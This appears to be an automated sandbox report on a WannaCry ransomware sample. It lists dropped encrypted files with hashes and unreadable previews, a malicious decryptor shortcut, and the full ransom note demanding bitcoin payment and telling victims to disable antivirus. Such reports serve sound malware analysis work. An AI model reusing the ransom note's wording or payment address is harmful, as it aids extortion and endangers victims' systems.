                                Preview: lr^.Z......B...&;.0U...;.:...=..\8..*N..3'.y...6.9.C......O.S..I...J..H%5.1k..._..5...".8.....P=1WM..w|F..5..v.Y.s.g.RzO..{.(..d..L.s.tv.5..Qk..%...1....jE..I.....gS;(.....Ib..=.a.iIi..^<.#...:Q..+.2/...v...7.b2..-?.9.....@.-......#IO..6Qu7....xn.X.XxBF..2..N....V.O... W.[......'..DH..e....B.\...j-.Fw.._?....hy.<b....f..f]....... ..Z)m.....z..Dl.....na..(62......(..)!.Av..B5s..r.....0?..d..6.......6..JQ..k>.6$.......Z.:..9E(.ir..P.xn0o?mI;A(vD...............c}..b.o.......8.b{...*.P..fy...Q...j.^.L...fk..0....y._.,"2.....3..4....rAtT ..E~.i.......z.3........V....&.Z.Y........zM:.U..].z.j.d...i3.&.H.(.=?......Jr....x/m.p.MI.G.W!....6.yfh.u..3.S.J../.lFl........p.N........`Wom...D&m2...4...N.$..8.W..A...d..}|{. Z.H}..DGQMs$(..G1....^..4..s..y..=7.LJj.D.o.2..........:q...T?.g%.s...:.Z..l........*.Xr6!!....Bq..F.e!.V.[..Iaa"4~...v.O.O#".z.....$K.kN.)*jq.X.*.....F.......^q3....1.U.}.%~.....g...t...u..9.).f....D..".....J...SN.....[..M.L6.(E

                                C:\Users\user\Desktop\BJZFPPWAPT.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.876037085497407
                                Encrypted:false
                                SSDEEP:24:bkQhPuqISjN6e+KLZvzbM16L2SMS2EXh5LBqi0SPU5XR9wQ4E1JDhwigOrGNUo1Z:bkQhPuqI6ke++ZvzA16PMKx+ipPUX/30
                                MD5:99E51748A95D56C6383CA76F7CE10098
                                SHA1:C710C152D24ED219DE30B1B6385614F6954822D2
                                SHA-256:B7B5440CD8F7A1EA8F5C28D606DCF07E58F53484CD9670D2FF565458A950435A
                                SHA-512:2210341D6048EF85D9DFB7913E0ADB7FC5AA8AA5B9B4C44745A6D6F47A2194CC8555D4890D488356C357C05046F23FBBB9F4659BB49BC051DB56933C370070F4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....X.D...n.d..M.{Bc...d...O...]o...h.qWRX..%E.w:....,..3r.|O8.:.!.33..bK..6f......+.-.e...............p..N..`X...*.%cM8..4HX...~.k....3'..7..0..VG........"...D.~...r...Te......p......Ut<..r.9...u.auG...6.!.~.'.c......Z...p.NT+.6..n[..z.2.e..8..............OY.\.$......}}h.....H.vw.TJ..~K_W....1.N_.....B...$.5A.T.t\X.....Eb,...Z8..V.;...+D..6..W.>...+.T2..AF?..f.....$.L.W...Ni...4..L...`........WZ.i.<.,B..v. ...^.6..y.c.^...&.R.{....`&.cpj.p....AE.......4..PF..%Y...$...o*:..T(.B..sKg..=...F....N...:.\.$.X.....i..oA.*.)\...F..j.H...C.........\8ce.-.M.b9.+./g..j...c..K.Z..>......~..-...N..m.....!.E.Au.@o..J..c...#!..C......3..s@H.4Cs\..^.u.T&...Q..i....4f.v..O`.r.%(...:..*@........ 9U...8...U..Y..{...vpR...~..MJf...]...Z.>....5..KC.Cy..%.<t..d.. ..Mv,.~.Me0.4......4c...1......u..0...L..dn..........H.<V...G.........,..i....Ke`7..f..V.6....\]....].x.....'K.Z#om?=I.....U.=b....R..J3).j...-.vI..IL...W'...$C.5.U..Zq...j..t..qB...a.u..9..

                                C:\Users\user\Desktop\BJZFPPWAPT.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.876037085497407
                                Encrypted:false
                                SSDEEP:24:bkQhPuqISjN6e+KLZvzbM16L2SMS2EXh5LBqi0SPU5XR9wQ4E1JDhwigOrGNUo1Z:bkQhPuqI6ke++ZvzA16PMKx+ipPUX/30
                                MD5:99E51748A95D56C6383CA76F7CE10098
                                SHA1:C710C152D24ED219DE30B1B6385614F6954822D2
                                SHA-256:B7B5440CD8F7A1EA8F5C28D606DCF07E58F53484CD9670D2FF565458A950435A
                                SHA-512:2210341D6048EF85D9DFB7913E0ADB7FC5AA8AA5B9B4C44745A6D6F47A2194CC8555D4890D488356C357C05046F23FBBB9F4659BB49BC051DB56933C370070F4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....X.D...n.d..M.{Bc...d...O...]o...h.qWRX..%E.w:....,..3r.|O8.:.!.33..bK..6f......+.-.e...............p..N..`X...*.%cM8..4HX...~.k....3'..7..0..VG........"...D.~...r...Te......p......Ut<..r.9...u.auG...6.!.~.'.c......Z...p.NT+.6..n[..z.2.e..8..............OY.\.$......}}h.....H.vw.TJ..~K_W....1.N_.....B...$.5A.T.t\X.....Eb,...Z8..V.;...+D..6..W.>...+.T2..AF?..f.....$.L.W...Ni...4..L...`........WZ.i.<.,B..v. ...^.6..y.c.^...&.R.{....`&.cpj.p....AE.......4..PF..%Y...$...o*:..T(.B..sKg..=...F....N...:.\.$.X.....i..oA.*.)\...F..j.H...C.........\8ce.-.M.b9.+./g..j...c..K.Z..>......~..-...N..m.....!.E.Au.@o..J..c...#!..C......3..s@H.4Cs\..^.u.T&...Q..i....4f.v..O`.r.%(...:..*@........ 9U...8...U..Y..{...vpR...~..MJf...]...Z.>....5..KC.Cy..%.<t..d.. ..Mv,.~.Me0.4......4c...1......u..0...L..dn..........H.<V...G.........,..i....Ke`7..f..V.6....\]....].x.....'K.Z#om?=I.....U.=b....R..J3).j...-.vI..IL...W'...$C.5.U..Zq...j..t..qB...a.u..9..

                                C:\Users\user\Desktop\BJZFPPWAPT.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.79464168243227
                                Encrypted:false
                                SSDEEP:24:cwoFHMpZblrHQw5bkdjNEjllbtaRLkRswbMQkvZ:EOZl5SdjNEMB
                                MD5:C34DE4FB2F6C2FB50A9854DD07018C79
                                SHA1:A61961E7AA025657559612B5C8E5DEA261DDC6C9
                                SHA-256:BE70FE8169CC6987116C491DB38453136511740DCC1BD460893FB70EEB4691C8
                                SHA-512:434C8337370392B9648CE2538A1788350D75C6D214383AAA74E9021D596908627EE2EABC5B575190158EDFBD874144590378F58F2EE79EB5957467FD55CD4E2A
                                Malicious:false
                                Reputation:unknown
                                Preview:..R]@;.b......3..e.`.^.,......^-m......7....nf^..,!l.5...~S;..t.G.R.sMQ......N.V.f..u.9...3;.W.mP..Q...f....G;.Vm&...*.'.l<...!>.F.L...H.....>..........5.K.-T.......V.4wy._P.Y.I.)..Sv.s..qg>F.y.ny......i.....n....Fi-.#..L.#...?.l:......mr.....J..6....;V.r..z}.Z.WVp.....)..Cj.......-....d7.!..#.../P.Q$..e...J...5e.3(3......,.Y+ VN..Dek.!...i..$...*+3.-...j(.F*A\r..o.~V...[.r..S...K.|^..H. ....U.k.e....t....1E.Byu..pc..%.I\q.I.}.M.^W1.41...H.....GG...4...qH...o...-G.T....b.'XB..I..')..N..i....c$....`......3..q.......".O..0l.1G.{n|!.....&k.~=...#~....@+L#.-Qk..?> .F..^.'n.....U,..B.~de?.q.DI....t....&.6..jN.lp....,.O..+.:.Y..D^i$TI...K(.U3%.{......&.f.. ...Pf..>e.fhV..`...1.%.. ...)...fk...KUE....NWT.G..Pr.>s(....@..X?b$.O.7...f..{..O?k..[.S....\o.3..C...+.ji...\M8@....E.l.%....(q...?...#...].....B.?.4..V(.yT.C>.',.^..x.^....g.....M}.<...B....a^1%......,u.~..q.T.U9...A.;.0H...b...V..u...a.Y.v.gL..b........M..".E.a..-....[..'y..H`.....w`.V+7..|5M7lT?

                                C:\Users\user\Desktop\BJZFPPWAPT.xlsx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.844318657083868
                                Encrypted:false
                                SSDEEP:24:bkGs2m+LEwD3EzGoJ85/4JLmB0rKT5O+N76w8dQAijXpjotbuH4qqSVd:bkG10wrEyLpEm6KVO4cdQACXpjEbuH4Q
                                MD5:D7852C8A2F11118E54567B84B7D11E66
                                SHA1:03F87135F4F557773936FFEFB0B8E81FA5E4D886
                                SHA-256:A14114219E674DCC5AA06C0FD0F7F3E3874E1BAFA7BFF9DC0A9F27247B4A00C7
                                SHA-512:C237398486A78F20A88F56BBE9212BA936CF3FA6490CDF2A27AA3FD52D553C3577864892BE491235724FDC09550A64F4F372BBA36C3311EEBB40425BBF5CEFAB
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....s.x.......1.S.;=.].6..0....j..Z.%4..Tg..r...V.=._`.i.U.;...A.""...\.T(.......O.Sk.x$...........}..&.]..jL.2o. .......}..u.M)..V...vi...M.......X...mm}_...._/d.,.U...+O?9K............1....O......J.'f.K.....Sdu..Z.K:.UO.....t/.._.BEJ.....f.............3.)g..V..;.]cFm....M9.c..;......3D.>..Qc4~A'1....D...}6..........k.G.....NM..v.........e."..7.<Tm.....H..6...M...p.}u ..G...F.t2.9.V.R6..1#ZPX.X.h...<:m.?.N./..p...y...`.EjA.FQ...2..q...s..Ns.....R2..V{%...|......L...$o....`.:J.T.......`V..-*.O..f..jN......+:....p....*=....D*.(1.>..YJJh.K..X....y.W|....yt.....c.C.S....!....dnXx}@..8h!P'I......O.jEo.y.0..W7a....A..J`...Pc..Ch^u.5.C..W.$..5M-.O.e$g.0..R4..K......l.6.=..Xh8L.....].3...8gJ.....9X\.)|.|4.".r.-..y?..%.........RT.Z..P..O-0....w..@..}C...../.....Z..<."...D.H|.....I%wL...D..\.....&..::|P../...$....'L....5NC.1.....S..........n0V..2G+.l..!.l.yuT......rT.q....i.K...k..R...}...%-...._......X%....J.fkz..@:r2EtS.Z=]).%.pT

                                C:\Users\user\Desktop\BJZFPPWAPT.xlsx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.844318657083868
                                Encrypted:false
                                SSDEEP:24:bkGs2m+LEwD3EzGoJ85/4JLmB0rKT5O+N76w8dQAijXpjotbuH4qqSVd:bkG10wrEyLpEm6KVO4cdQACXpjEbuH4Q
                                MD5:D7852C8A2F11118E54567B84B7D11E66
                                SHA1:03F87135F4F557773936FFEFB0B8E81FA5E4D886
                                SHA-256:A14114219E674DCC5AA06C0FD0F7F3E3874E1BAFA7BFF9DC0A9F27247B4A00C7
                                SHA-512:C237398486A78F20A88F56BBE9212BA936CF3FA6490CDF2A27AA3FD52D553C3577864892BE491235724FDC09550A64F4F372BBA36C3311EEBB40425BBF5CEFAB
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....s.x.......1.S.;=.].6..0....j..Z.%4..Tg..r...V.=._`.i.U.;...A.""...\.T(.......O.Sk.x$...........}..&.]..jL.2o. .......}..u.M)..V...vi...M.......X...mm}_...._/d.,.U...+O?9K............1....O......J.'f.K.....Sdu..Z.K:.UO.....t/.._.BEJ.....f.............3.)g..V..;.]cFm....M9.c..;......3D.>..Qc4~A'1....D...}6..........k.G.....NM..v.........e."..7.<Tm.....H..6...M...p.}u ..G...F.t2.9.V.R6..1#ZPX.X.h...<:m.?.N./..p...y...`.EjA.FQ...2..q...s..Ns.....R2..V{%...|......L...$o....`.:J.T.......`V..-*.O..f..jN......+:....p....*=....D*.(1.>..YJJh.K..X....y.W|....yt.....c.C.S....!....dnXx}@..8h!P'I......O.jEo.y.0..W7a....A..J`...Pc..Ch^u.5.C..W.$..5M-.O.e$g.0..R4..K......l.6.=..Xh8L.....].3...8gJ.....9X\.)|.|4.".r.-..y?..%.........RT.Z..P..O-0....w..@..}C...../.....Z..<."...D.H|.....I%wL...D..\.....&..::|P../...$....'L....5NC.1.....S..........n0V..2G+.l..!.l.yuT......rT.q....i.K...k..R...}...%-...._......X%....J.fkz..@:r2EtS.Z=]).%.pT

                                C:\Users\user\Desktop\BNAGMGSPLO.docx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.766652737060187
                                Encrypted:false
                                SSDEEP:24:AqPboGN016VeNrWA6GNGaBnM1gGMJe29L+cDzcRLBAqlXhKEr:RPbt0oBf12ntGM19LQzlRKEr
                                MD5:15D4394291D092B614071D85D42E4BE5
                                SHA1:8BA91814215392B152A954ABFA776041AA1E5E68
                                SHA-256:2016F58DFAA698D0A6B9E36412DEAC207EF6352F19B98E42FFDBBC932CB3C6A8
                                SHA-512:2B781F2349A9B3369E5C9B8078C6C3E75BC17322B47660B48AB76707FB260F5A58AF8981B54DDA76E9F4F08A0F6C08AD8DFDCCBD3EAFD02844E7847FA3DF3504
                                Malicious:false
                                Reputation:unknown
                                Preview:......H....a.Y....'7.{..].........=.5H.g...'\.c...... ...E.$_L..... d.Lc.[..c.....e,L.sO..L.d&.^....'....b.*.e.(o..k..$...A.v...P=y.X)E.....:....]7...0..N}.0).|h...A.Y(7.(.."...c=........m..3.n4..+....c.|...h..).g.i.:..>hU....1..=C.....\.q..Qe.un24<..U....<N.;N......B....X.nP"...~J,...r..?.i..T.F.H.../."'=y.8F.......@!...2.`.....:P=..lMD..%.D....j.R.J.gN.....B...^6H.s..../......J;".IP*mz.h......e..;.K.y.J...\.@..@.x(..g...4\}....{K.#r..).,.....yfF...NA.\...N...T~.......].k1..9F#......a.l.?.f.W.U..v.R...t...aQ..jxO..3...#^.~..T..tjN.ub+.Q.s..5.#.....~.0M....EDX....%j.*.....).#..W\.....L...h..Q.<P.I.B......s..=).(..j.z...:c%.sekc..s...bL...2..@.s.........<?8.g...$..=..n7.:...taK...;Eun.G.......7..I.J..eo.!.}......[..}.:.../.........K.B.\)..(.~oH`K..KMe..D..}O.....A.........[6:..}.EB.AQB.. ..nY.hN.0hb.87.)Y..J.#.e......w\1.P...?}...[<."a.T.y....B6.b....<%..5..w~.o^Z..mD..?0iM..^{_:.....86...h.~...r.#...P.c..:...q..z@$$...I._...Dh.._IlZ.....{

                                C:\Users\user\Desktop\BNAGMGSPLO.docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8449958923201155
                                Encrypted:false
                                SSDEEP:24:bkmj8H2Pe5rRICnFbJke4sKB/MzyEwQ/3Msk6lggObcLLeEgf2aT48v/lFAx1urD:bkOiscFbJkJsQUe+n8cLlgv48IS/
                                MD5:3BF3A2177057293B0D6842239841A5D0
                                SHA1:EDF256E32464A5718A14B67D69B06C602BE37A8D
                                SHA-256:655BBD211079C078F29D7EFDC295312EFA65C419A627BD183F2913B93112948C
                                SHA-512:0A8A999B586DF3E68AE30F2235BE9BADD96F75F6A92C847B4C5B63AF23C41F565084B1E62B51FB6A7762CCF924A959763E81A65A9A3FE5874AE3E5705EF22231
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......F]N..P!H..t...K..g`Y!E.qK.X.&..I0S.x...f...l....k..U....v2.;.D!.@....=:?..Z....G.V>.?.&e.}......d..6...HYL.\..9.........j...h.'.......5R....).27.Lz.3..Gl......t".K@..?B_.^...~.l.........<..Q....(..'....D/.q..ZQq.Bt.U..5.'....9.J.H...............Q..0.....?Y;...h..\....r59.N.8....E.j...9..Vr.b._....b!.y...q.Q.h.0.w&s..].3.n....%[..N..M...F..HU2....0..^p..I..qu.".v..8?r.....i..n.".F.......k.%{.7..Hw.c...!E5..2.'..!4..(.C*Iu...A..w......b]...0~@.....H..z.&w.4a......\...C4n.k....t......L.\....u..-.VEfE"../..n..n.>.Y.......jB.se....=lF.....!+n.Y.e*.u..wU..=....iOE]........tWW..<.W....U.E...._.....a*e9..Co...}....ys.5....h.(.7o.....IC.9<O..U.1.5..T..U...[..Q.G....d.x........). .<....5..;k..`.Z}CY....bn7.m.Jh=.......%S^.....[{.pM.2&.].&..OAL<.=.q..p.....'.....7Ux...PD........TL.P.Z!H..tY...y.z..c......i....f...G........<. W..*.........t.mJ..%Gl....%.|.Vqe.T}...[E.kcX.."...x.`.*.<..7il.?...4.-..&.. ....zwv...M..*...}.!..;...|..o..g.

                                C:\Users\user\Desktop\BNAGMGSPLO.docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8449958923201155
                                Encrypted:false
                                SSDEEP:24:bkmj8H2Pe5rRICnFbJke4sKB/MzyEwQ/3Msk6lggObcLLeEgf2aT48v/lFAx1urD:bkOiscFbJkJsQUe+n8cLlgv48IS/
                                MD5:3BF3A2177057293B0D6842239841A5D0
                                SHA1:EDF256E32464A5718A14B67D69B06C602BE37A8D
                                SHA-256:655BBD211079C078F29D7EFDC295312EFA65C419A627BD183F2913B93112948C
                                SHA-512:0A8A999B586DF3E68AE30F2235BE9BADD96F75F6A92C847B4C5B63AF23C41F565084B1E62B51FB6A7762CCF924A959763E81A65A9A3FE5874AE3E5705EF22231
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......F]N..P!H..t...K..g`Y!E.qK.X.&..I0S.x...f...l....k..U....v2.;.D!.@....=:?..Z....G.V>.?.&e.}......d..6...HYL.\..9.........j...h.'.......5R....).27.Lz.3..Gl......t".K@..?B_.^...~.l.........<..Q....(..'....D/.q..ZQq.Bt.U..5.'....9.J.H...............Q..0.....?Y;...h..\....r59.N.8....E.j...9..Vr.b._....b!.y...q.Q.h.0.w&s..].3.n....%[..N..M...F..HU2....0..^p..I..qu.".v..8?r.....i..n.".F.......k.%{.7..Hw.c...!E5..2.'..!4..(.C*Iu...A..w......b]...0~@.....H..z.&w.4a......\...C4n.k....t......L.\....u..-.VEfE"../..n..n.>.Y.......jB.se....=lF.....!+n.Y.e*.u..wU..=....iOE]........tWW..<.W....U.E...._.....a*e9..Co...}....ys.5....h.(.7o.....IC.9<O..U.1.5..T..U...[..Q.G....d.x........). .<....5..;k..`.Z}CY....bn7.m.Jh=.......%S^.....[{.pM.2&.].&..OAL<.=.q..p.....'.....7Ux...PD........TL.P.Z!H..tY...y.z..c......i....f...G........<. W..*.........t.mJ..%Gl....%.|.Vqe.T}...[E.kcX.."...x.`.*.<..7il.?...4.-..&.. ....zwv...M..*...}.!..;...|..o..g.

                                C:\Users\user\Desktop\BNAGMGSPLO.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.814633834419284
                                Encrypted:false
                                SSDEEP:24:M9ddSnmq1h5yVa/4kz3m0UreREkQrn5cXOET76GasS8Sk8N:M9ddSnf5yW4k2NLLEHPS8b8N
                                MD5:28FB151652BD31D3261087450A74E569
                                SHA1:08C32AE8D54A092E5D84F3F9C9C66E55BB91B0B8
                                SHA-256:B1DA3465A0936C955E8BA3B3DE4D5DAB2D52D232162F4A8F524523B838D832B6
                                SHA-512:E50486024B473AEB6FAB51F6C32BD6F1138CB134CF849A40AD02214555CD4311A078A387CC7AF5EF4EC029777D189CAA193A384BA7B737C943E1841CF2CC0EC7
                                Malicious:false
                                Reputation:unknown
                                Preview:{.....v....s...ER....6e...X.I.*.>.....T.+3..Z.A.y(.g27..zUP....x..V.k.(..h..p.8K.4......r.Q.&\....y...8...._.3.......B.w.Q.@aM..}...pJ..B.."......L.h....4..`...Kgn..B.CR/.|....)...&I.'..%)U....s1..f.@...\.. t...,....V..7Om..$..U..!....E..J..i.r......P..bO.c:n.V...}Kq.E.*...h.s...............^.....b.-.f.E..S....f5..Y[...t .B.O.O....J.qn..s.......&....@.Kt.TU..R.<....K...._..~D....Rn{Q.0se.....<(..#boOVhu.A.m.+.^..(&.L!.%]v.2.X.I.....d..r...?......H.6..P........8f7] 2............'<8t...&......:.5.]..#..yVc......qw.b.....P0e.......M$....>.x....e}.....0.|...td.....,/.c.t].@...&~Q.$..S.....4..G...J .@...3..7......i%..;...J.){.w.(.....j&Qu.+..B.2.v..<..s.h...8.[t....R..7..]<....Y..<.mJ..".O..{...YY.0..y..r{\.A.:*E.p.S@P.F..?.......Q...9..q~.uq....s.-.$.....J>..H.....`.*.......E....5.....#`...|A..~.....u8,.J.......R..R:...r...M.#..a.~.F.h....~W..{.=.ik.m$......E.%>..%.C..*I."...........d&...O...!......M]<n..Y..B.WLb.(..'^3...D....

                                C:\Users\user\Desktop\BNAGMGSPLO.xlsx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8656171812228575
                                Encrypted:false
                                SSDEEP:24:bkBuVjY72o7G8zhoj7q8sRV9c9PGrrIN/I+S/648+AN1vfIXaj6kG2o+5:bkyYqo9aj7q8OV9c9LkQN1q2oq
                                MD5:B96DF3FD833B9807360D68E8A6863667
                                SHA1:2ECB42F541BC8C874676F6B10E7B8CB7AAD3B1DF
                                SHA-256:6D5923B587F3F561EC5F1D77C13023DCCBEA3ECE181D2BF148FAB9DC0CA35AB2
                                SHA-512:F62370D8952279ABDEABF54CF748B1A93FB9BA642B12FD6075E72DED406D7E2E48EDDA96ED5473143504A8AE48D77C77DB8A74C98F0BD1822AB7C4BF88726CD0
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....t..9.q..n;....zMP-x.P*"...j..Az..`.....1...#.~...qi..+...Yf.2..5.q..O4.H...[..w...).".....f...-......?.d..?!.Zu}.....|J)o..)..P!..4....y..g..%.....>4u....%{P.<.x.f..<.....L.F2/*U.U.]...CP...m$S...~[..q.E%...N..Ow..d...fEv.J.......x..............r.....jZ.......D`.`w...}.r..*G.0+R....." ..*.^..M-v..9..o.c8.G....3:%.bJ..zPe..:').^..AG.l./.OL.d.. D8...........Vy..j..|A..Xi.8vrR".).Z.x.............q'....X.,.`.m..Hv..h...S.8............f.m...KLYG.![u.9@@w...p..J1.... .L..O.+..|&.........V).o....... fl..E..%z.7M4......*P...s7.fK.....J..-."G}-.K$N...#.^..!.!....Z..y.....D.,U.t......9...K..!..}.....ng..V:+..Y.F...s.X$..7J...;.w.h.*.(C...V..m...\$..4.5{.....%......}?.?Z...,..v.=.Z9G.;...zeP...(J.v..h...Y.c....|.!.8W......N.....3v.*im".;`c..f:.....P.Z.TB..j...^....W...+.FkrkF&...F.||.&.Y;.H ...\.o.....,9.(.a..N.dR..N%..&....%.%.....r#V.n%..a.;.8_{..k..1.).M...=..M..L....'2.....l.3...&../..X..)..BU.....I6.m..z.A.0..w.M..

                                C:\Users\user\Desktop\BNAGMGSPLO.xlsx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8656171812228575
                                Encrypted:false
                                SSDEEP:24:bkBuVjY72o7G8zhoj7q8sRV9c9PGrrIN/I+S/648+AN1vfIXaj6kG2o+5:bkyYqo9aj7q8OV9c9LkQN1q2oq
                                MD5:B96DF3FD833B9807360D68E8A6863667
                                SHA1:2ECB42F541BC8C874676F6B10E7B8CB7AAD3B1DF
                                SHA-256:6D5923B587F3F561EC5F1D77C13023DCCBEA3ECE181D2BF148FAB9DC0CA35AB2
                                SHA-512:F62370D8952279ABDEABF54CF748B1A93FB9BA642B12FD6075E72DED406D7E2E48EDDA96ED5473143504A8AE48D77C77DB8A74C98F0BD1822AB7C4BF88726CD0
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....t..9.q..n;....zMP-x.P*"...j..Az..`.....1...#.~...qi..+...Yf.2..5.q..O4.H...[..w...).".....f...-......?.d..?!.Zu}.....|J)o..)..P!..4....y..g..%.....>4u....%{P.<.x.f..<.....L.F2/*U.U.]...CP...m$S...~[..q.E%...N..Ow..d...fEv.J.......x..............r.....jZ.......D`.`w...}.r..*G.0+R....." ..*.^..M-v..9..o.c8.G....3:%.bJ..zPe..:').^..AG.l./.OL.d.. D8...........Vy..j..|A..Xi.8vrR".).Z.x.............q'....X.,.`.m..Hv..h...S.8............f.m...KLYG.![u.9@@w...p..J1.... .L..O.+..|&.........V).o....... fl..E..%z.7M4......*P...s7.fK.....J..-."G}-.K$N...#.^..!.!....Z..y.....D.,U.t......9...K..!..}.....ng..V:+..Y.F...s.X$..7J...;.w.h.*.(C...V..m...\$..4.5{.....%......}?.?Z...,..v.=.Z9G.;...zeP...(J.v..h...Y.c....|.!.8W......N.....3v.*im".;`c..f:.....P.Z.TB..j...^....W...+.FkrkF&...F.||.&.Y;.H ...\.o.....,9.(.a..N.dR..N%..&....%.%.....r#V.n%..a.;.8_{..k..1.).M...=..M..L....'2.....l.3...&../..X..)..BU.....I6.m..z.A.0..w.M..

                                C:\Users\user\Desktop\BNAGMGSPLO\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\Users\user\Desktop\BNAGMGSPLO\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\Users\user\Desktop\BNAGMGSPLO\BJZFPPWAPT.jpg

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.796441820550681
                                Encrypted:false
                                SSDEEP:24:5virJCATcPE2sbbMilfrJdb8dN+3KU8arJfy3R7YfS+pKF4:5vpf82skur78dw6MrJfcCoK
                                MD5:5694350CC437C5B99765EE5F7599A50C
                                SHA1:CAA1B663EFCF02939BF41F4687EBE02B244BD414
                                SHA-256:D83115D6B0E430C989644E71FA544AA03A6FAE1E2C4AB5E52F6F5C258D0B7897
                                SHA-512:1F511800DE2204BE3FB4D2C725A8167F7FB14CA3E85FAD2E8720553A90A24E64C587F746566C63CE34F3CFFA71AA8C6FBA86E231F9B9DDA63D427F2AA52D795C
                                Malicious:false
                                Reputation:unknown
